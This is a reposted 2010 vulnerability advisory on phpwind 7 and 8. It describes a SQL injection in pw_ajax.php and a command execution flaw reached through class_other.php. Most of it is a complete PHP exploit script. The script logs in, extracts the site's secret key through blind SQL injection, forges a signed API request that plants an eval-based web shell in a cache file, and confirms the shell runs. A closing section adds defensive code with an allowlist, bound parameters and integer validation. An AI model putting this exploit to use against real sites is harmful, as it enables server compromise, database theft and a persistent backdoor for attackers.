phpwind multiple remote code execution vulnerabilities (phpwind multiple sql injection vulnerability)

Reposted. Published: 2010-09-05  Updated: 2010-09-06
Severity: medium
Threat level: control of the application system
Error type: input validation error
Exploitation: server side

Affected systems
phpwind 7

Detailed description
phpwind versions 7 and 8 contain an input validation vulnerability; an attacker who successfully exploits it can remotely execute arbitrary PHP code.
The problem lies in pw_ajax.php: data submitted in the fieldname parameter is not sufficiently filtered, so an attacker can use it for SQL injection and read any data in the database.
In addition, class_other.php contains an arbitrary command execution vulnerability because the $class[cid] input is not sufficiently filtered. Reaching that code path requires a fairly critical key, which can be obtained through the injection described above.

PHPWind has a SQL injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "fieldname" parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. In addition, input passed to the "$class[cid]" parameter in class_other.php is not properly sanitised before being used in a SQL query. Reaching this logic requires an important key, which an attacker could obtain by exploiting the SQL injection vulnerability above.

Test code

<?php
echo "
Info: Poc for Phpwind远程命令执行
Test: exploit.php user password http://www.wooyun.org/phpwind/
";
if($argc<3){
    echo "\r\n参数缺少\r\n";
    die();
}
$user=$argv[1];
$pass=$argv[2];
$pwurl=$argv[3];
$myheader=array(
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: zh-cn,zh;q=0.5',
    'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'Referer: http://www.wooyun.org/',
    'Connection: Keep-Alive',
    'Cache-Control: no-cache',
    'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
);
$cookie="";
$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);
preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);
for($i=0;$i<count($array[1]);$i++){
    $cookie=$cookie.";".$array[1][$i];
}
//echo $cookie;
$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);
if(strpos($test,'<ajax>')) {
    die('用户密码或者其他参数错误');
}
$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";
$hash="0123456789abcdef";
$craked="";
for($i=0;$i<32;$i++){
    for($n=0;$n<16;$n++){
        $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);
        $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);
        if(strpos($tmp,"pw_config")){
            echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n";
            $craked=$craked.$hash[$n];
            break;
        }
    }
}
echo "Craked Magicdata :".$craked."\r\n";
echo "Get shell :";
//another 0day
$arg='';
$hack = array();
$hack['mode'] = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';
$hack['type'] = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg.='sig='.md5($arg.$craked);
echo file_get_contents("$pwurl/pw_api.php?".$arg);
echo "OK\r\n";
$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if(strpos($str,'wooyun')){
    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();";
    echo "\r\nOver!";
}

function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = strips($value);
        }
    } else {
        $param = stripslashes($param);
    }
    return $param;
}

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){
    global $cookie;
    $ch = curl_init();
    $timeout = 0; // set to zero for no timeout
    curl_setopt ($ch, CURLOPT_URL, $url);
    curl_setopt ($ch, CURLOPT_POST, $method);
    curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
    if($data){
        curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
    }
    curl_setopt ($ch, CURLOPT_HEADER, $header);
    if($ssl){
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }
    $handles = curl_exec($ch);
    curl_close($ch);
    //echo $handles;
    return $handles;
}

Solution
No detailed solution is currently available:
http://www.phpwind.net

Related information
http://www.wooyun.org/bug.php?action=view&id=417
结界师
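The two defects described in the advisory, shown as an added illustration in PHP that is not phpwind's own code: a request-supplied column name (`fieldname`) spliced straight into SQL, beside a handler that checks the name against a fixed allowlist and binds the data value, plus a strict integer check for a category id such as `cid` before it is used anywhere. The table, column and function names (`pw_members`, `icon`, `bgimage`, `deleteImageVulnerable`, `deleteImageSafe`, `parseCid`) and the `$db` mysqli connection are assumptions made for the example.

```php
<?php
// Added illustration for the advisory above; not phpwind's own code.
// Assumed names: $db (mysqli), table pw_members, columns icon/bgimage.
declare(strict_types=1);

// Vulnerable pattern: the column name comes from the request and is
// spliced into the statement text, so "fieldname" can carry a whole
// subquery ("... from pw_config where ... union select ...") and the
// query reads rows the action was never meant to touch.
function deleteImageVulnerable(mysqli $db, string $fieldname, int $uid): void
{
    $db->query("UPDATE pw_members SET $fieldname='' WHERE uid=$uid");
}

// Hardened form. A column name cannot be sent as a bound parameter, so it
// is accepted only if it is one of the columns this action may clear; the
// user id is bound, so nothing from the request reaches the SQL text.
const IMAGE_FIELDS = ['icon' => true, 'bgimage' => true]; // assumed names

function deleteImageSafe(mysqli $db, string $fieldname, int $uid): bool
{
    if (!isset(IMAGE_FIELDS[$fieldname])) {
        return false;                 // unknown column: refuse, do not query
    }
    $stmt = $db->prepare("UPDATE pw_members SET `$fieldname`='' WHERE uid=?");
    $stmt->bind_param('i', $uid);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// For the second issue the advisory names $class[cid]; the PoC sends a
// nested array whose innermost value is a string carrying quotes and
// eval(). Treating the id strictly as a positive integer and rejecting
// anything else (strings, arrays) removes that input class entirely.
function parseCid($raw): ?int
{
    $cid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $cid === false ? null : $cid;
}

// Constructed inputs modelled on the PoC; no database is needed for these.
var_dump(isset(IMAGE_FIELDS['db_value from pw_config where db_name like 0x64 union select 0x61']));
var_dump(parseCid(['cid' => ['cid' => "'.eval(\$_GET[c]).'abc"]]));
var_dump(parseCid('12'));
```

The PoC also shows why the second bug was reachable at all: the `pw_api.php` request is authenticated with `md5` over the arguments plus a value stored in `pw_config`, so any read-only SQL injection that can pull config rows also yields the signing secret. Closing the injection with an allowlist is the fix that matters; storing API secrets where ordinary page queries can read them is the design choice that turned one bug into two.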